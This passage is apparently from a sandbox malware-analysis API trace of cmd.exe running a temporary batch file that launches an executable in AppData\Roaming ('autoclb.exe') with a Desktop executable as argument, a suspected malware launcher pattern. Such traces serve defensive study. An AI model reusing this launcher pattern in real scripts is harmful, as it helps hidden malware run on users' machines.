_String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 68 [0065.332] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 68 [0065.332] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 71 [0065.332] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 71 [0065.332] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 80 [0065.332] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"") returned 80 [0065.334] GetConsoleTitleW (in: lpConsoleTitle=0x58f6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.335] GetFileAttributesW (lpFileName="\"C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat\"")) returned 0xffffffff [0065.335] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0065.335] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0065.335] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0065.335] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0065.336] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0065.336] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0065.336] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0065.336] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0065.336] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0065.336] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0065.336] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0065.336] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0065.336] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0065.336] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0065.336] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0065.336] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0065.336] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0065.336] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0065.336] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0065.336] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0065.336] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0065.336] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0065.336] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0065.336] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0065.336] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0065.336] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0065.336] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0065.336] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0065.336] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0065.336] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0065.336] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0065.336] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0065.336] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0065.336] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0065.336] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0065.336] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0065.336] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0065.336] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0065.337] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0065.337] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0065.337] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0065.337] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0065.337] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0065.337] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0065.337] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0065.337] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0065.337] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0065.337] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0065.337] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0065.337] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0065.337] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0065.337] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0065.337] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0065.337] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0065.337] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0065.337] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0065.337] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0065.337] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0065.337] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0065.337] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0065.337] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0065.337] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0065.338] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0065.338] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0065.338] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0065.338] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0065.338] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0065.338] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0065.338] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0065.338] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0065.338] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0065.338] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0065.338] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0065.338] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0065.338] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0065.338] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0065.338] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0065.338] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0065.338] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0065.338] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0065.338] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0065.338] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0065.339] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0065.339] SetErrorMode (uMode=0x0) returned 0x0 [0065.339] SetErrorMode (uMode=0x1) returned 0x0 [0065.339] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\.", nBufferLength=0x208, lpBuffer=0x7b05d0, lpFilePart=0x58f1b4 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE", lpFilePart=0x58f1b4*="74EE") returned 0x29 [0065.339] SetErrorMode (uMode=0x0) returned 0x1 [0065.339] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\.") returned 1 [0065.340] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.344] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.344] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", fInfoLevelId=0x1, lpFindFileData=0x58ef60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58ef60) returned 0x7bb320 [0065.344] FindClose (in: hFindFile=0x7bb320 | out: hFindFile=0x7bb320) returned 1 [0065.344] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0065.344] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0065.344] GetConsoleTitleW (in: lpConsoleTitle=0x58f434, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.345] ApiSetQueryApiSetPresence () returned 0x0 [0065.345] ResolveDelayLoadedAPI () returned 0x74bf14a0 [0065.458] SaferWorker () returned 0x0 [0065.485] SetErrorMode (uMode=0x0) returned 0x0 [0065.485] SetErrorMode (uMode=0x1) returned 0x0 [0065.485] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", nBufferLength=0x104, lpBuffer=0x7bae70, lpFilePart=0x58f2e4 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", lpFilePart=0x58f2e4*="11F7.bat") returned 0x32 [0065.485] SetErrorMode (uMode=0x0) returned 0x1 [0065.485] wcsspn (_String=" \"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", _Control=" \x09") returned 0x1 [0065.486] CmdBatNotificationStub () returned 0x1 [0065.486] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.487] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0065.487] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.487] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.487] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.487] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.487] ReadFile (in: hFile=0xb4, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x6e, lpOverlapped=0x0) returned 1 [0065.488] SetFilePointer (in: hFile=0xb4, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0065.488] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=11, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr=":18135671\r\n") returned 11 [0065.489] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.489] GetFileType (hFile=0xb4) returned 0x1 [0065.489] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.489] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0065.490] _tell (_FileHandle=3) returned 11 [0065.490] _close (_FileHandle=3) returned 0 [0065.490] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.490] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0065.490] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.491] SetFilePointer (in: hFile=0xb4, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0065.491] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.491] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0065.491] ReadFile (in: hFile=0xb4, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x63, lpOverlapped=0x0) returned 1 [0065.491] SetFilePointer (in: hFile=0xb4, lDistanceToMove=44, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2c [0065.491] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=33, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr="if not exist %1 goto 4276831624\r\n") returned 33 [0065.492] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.492] GetFileType (hFile=0xb4) returned 0x1 [0065.492] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.492] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c [0065.492] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.492] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.492] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.492] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.492] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.493] _wcsicmp (_String1="not", _String2="/I") returned 63 [0065.494] _wcsicmp (_String1="ERRORLEVEL", _String2="not") returned -9 [0065.494] _wcsicmp (_String1="EXIST", _String2="not") returned -9 [0065.494] _wcsicmp (_String1="CMDEXTVERSION", _String2="not") returned -11 [0065.494] _wcsicmp (_String1="DEFINED", _String2="not") returned -10 [0065.494] _wcsicmp (_String1="NOT", _String2="not") returned 0 [0065.495] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0065.495] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0065.497] _wcsicmp (_String1="goto", _String2=")") returned 62 [0065.497] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0065.497] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0065.497] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0065.497] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0065.497] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0065.497] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0065.498] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.499] _tell (_FileHandle=3) returned 44 [0065.499] _close (_FileHandle=3) returned 0 [0065.508] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f108 | out: _Buffer="\r\n") returned 2 [0065.508] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.508] GetFileType (hFile=0x3c) returned 0x2 [0065.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.508] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e0 | out: lpMode=0x58f0e0) returned 1 [0065.508] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.508] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f0f8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f0f8*=0x2) returned 1 [0065.509] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xa0e4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0065.509] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.509] _vsnwprintf (in: _Buffer=0xa09be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x58f104 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0065.509] _vsnwprintf (in: _Buffer=0xa09c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x58f104 | out: _Buffer=">") returned 1 [0065.509] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.509] GetFileType (hFile=0x3c) returned 0x2 [0065.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.509] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e4 | out: lpMode=0x58f0e4) returned 1 [0065.510] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.510] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa09be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x58f0fc, lpReserved=0x0 | out: lpBuffer=0xa09be0*, lpNumberOfCharsWritten=0x58f0fc*=0x1e) returned 1 [0065.512] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f3a4 | out: _Buffer="if ") returned 3 [0065.512] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.512] GetFileType (hFile=0x3c) returned 0x2 [0065.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.512] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f37c | out: lpMode=0x58f37c) returned 1 [0065.512] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.512] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x58f394, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f394*=0x3) returned 1 [0065.513] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f394 | out: _Buffer="not ") returned 4 [0065.513] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.513] GetFileType (hFile=0x3c) returned 0x2 [0065.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.513] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f36c | out: lpMode=0x58f36c) returned 1 [0065.513] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.513] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x58f384, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f384*=0x4) returned 1 [0065.514] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x58f390 | out: _Buffer="exist \"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" ") returned 63 [0065.514] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.514] GetFileType (hFile=0x3c) returned 0x2 [0065.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.514] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f368 | out: lpMode=0x58f368) returned 1 [0065.514] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.514] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x58f380, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f380*=0x3f) returned 1 [0065.515] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.515] GetFileType (hFile=0x3c) returned 0x2 [0065.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.515] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f374 | out: lpMode=0x58f374) returned 1 [0065.515] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.515] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7b7a00*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x58f38c, lpReserved=0x0 | out: lpBuffer=0x7b7a00*, lpNumberOfCharsWritten=0x58f38c*=0x4) returned 1 [0065.515] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x58f394 | out: _Buffer=" 4276831624 ") returned 12 [0065.515] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.515] GetFileType (hFile=0x3c) returned 0x2 [0065.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.515] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f36c | out: lpMode=0x58f36c) returned 1 [0065.516] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.516] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x58f384, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f384*=0xc) returned 1 [0065.516] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f3b8 | out: _Buffer="\r\n") returned 2 [0065.516] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.516] GetFileType (hFile=0x3c) returned 0x2 [0065.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.516] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f390 | out: lpMode=0x58f390) returned 1 [0065.517] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.517] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f3a8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f3a8*=0x2) returned 1 [0065.517] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", nBufferLength=0x208, lpBuffer=0x58ef10, lpFilePart=0x58ecb8 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpFilePart=0x58ecb8*="autoclb.exe") returned 0x36 [0065.517] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0065.517] FindFirstFileExW (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", fInfoLevelId=0x1, lpFindFileData=0x58ecc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58ecc0) returned 0x7c8ac8 [0065.518] FindClose (in: hFindFile=0x7c8ac8 | out: hFindFile=0x7c8ac8) returned 1 [0065.518] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.518] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0065.518] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.518] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0e40c | out: lpMode=0xa0e40c) returned 1 [0065.518] _get_osfhandle (_FileHandle=0) returned 0x38 [0065.518] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xa0e408 | out: lpMode=0xa0e408) returned 1 [0065.519] SetConsoleInputExeNameW () returned 0x1 [0065.519] GetConsoleOutputCP () returned 0x1b5 [0065.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xa0e460 | out: lpCPInfo=0xa0e460) returned 1 [0065.519] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.519] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x58f374, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.520] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0065.520] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.520] SetFilePointer (in: hFile=0xb4, lDistanceToMove=44, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2c [0065.520] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.520] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c [0065.521] ReadFile (in: hFile=0xb4, lpBuffer=0xa1a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x58f344, lpOverlapped=0x0 | out: lpBuffer=0xa1a960*, lpNumberOfBytesRead=0x58f344*=0x42, lpOverlapped=0x0) returned 1 [0065.521] SetFilePointer (in: hFile=0xb4, lDistanceToMove=60, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3c [0065.521] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xa1a960, cbMultiByte=16, lpWideCharStr=0xa057e0, cchWideChar=8191 | out: lpWideCharStr="cmd /C \"%1 %2\"\r\ngoto 4276831624\r\n") returned 16 [0065.521] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.521] GetFileType (hFile=0xb4) returned 0x1 [0065.521] _get_osfhandle (_FileHandle=3) returned 0xb4 [0065.521] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3c [0065.521] _wcsicmp (_String1="cmd", _String2=")") returned 58 [0065.521] _wcsicmp (_String1="FOR", _String2="cmd") returned 3 [0065.521] _wcsicmp (_String1="FOR/?", _String2="cmd") returned 3 [0065.521] _wcsicmp (_String1="IF", _String2="cmd") returned 6 [0065.521] _wcsicmp (_String1="IF/?", _String2="cmd") returned 6 [0065.521] _wcsicmp (_String1="REM", _String2="cmd") returned 15 [0065.521] _wcsicmp (_String1="REM/?", _String2="cmd") returned 15 [0065.522] _tell (_FileHandle=3) returned 60 [0065.522] _close (_FileHandle=3) returned 0 [0065.522] _vsnwprintf (in: _Buffer=0xa16940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x58f108 | out: _Buffer="\r\n") returned 2 [0065.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.522] GetFileType (hFile=0x3c) returned 0x2 [0065.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.522] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e0 | out: lpMode=0x58f0e0) returned 1 [0065.523] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.523] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa16940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x58f0f8, lpReserved=0x0 | out: lpBuffer=0xa16940*, lpNumberOfCharsWritten=0x58f0f8*=0x2) returned 1 [0065.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa16720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0065.523] _vsnwprintf (in: _Buffer=0xa09be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x58f104 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0065.523] _vsnwprintf (in: _Buffer=0xa09c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x58f104 | out: _Buffer=">") returned 1 [0065.523] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.523] GetFileType (hFile=0x3c) returned 0x2 [0065.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0065.523] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x58f0e4 | out: lpMode=0x58f0e4) returned 1 [0065.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.524] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xa09be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x58f0fc, lpReserved=0x0 | out: lpBuffer=0xa09be0*, lpNumberOfCharsWritten=0x58f0fc*=0x1e) returned 1 [0065.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0065.524] GetFileType 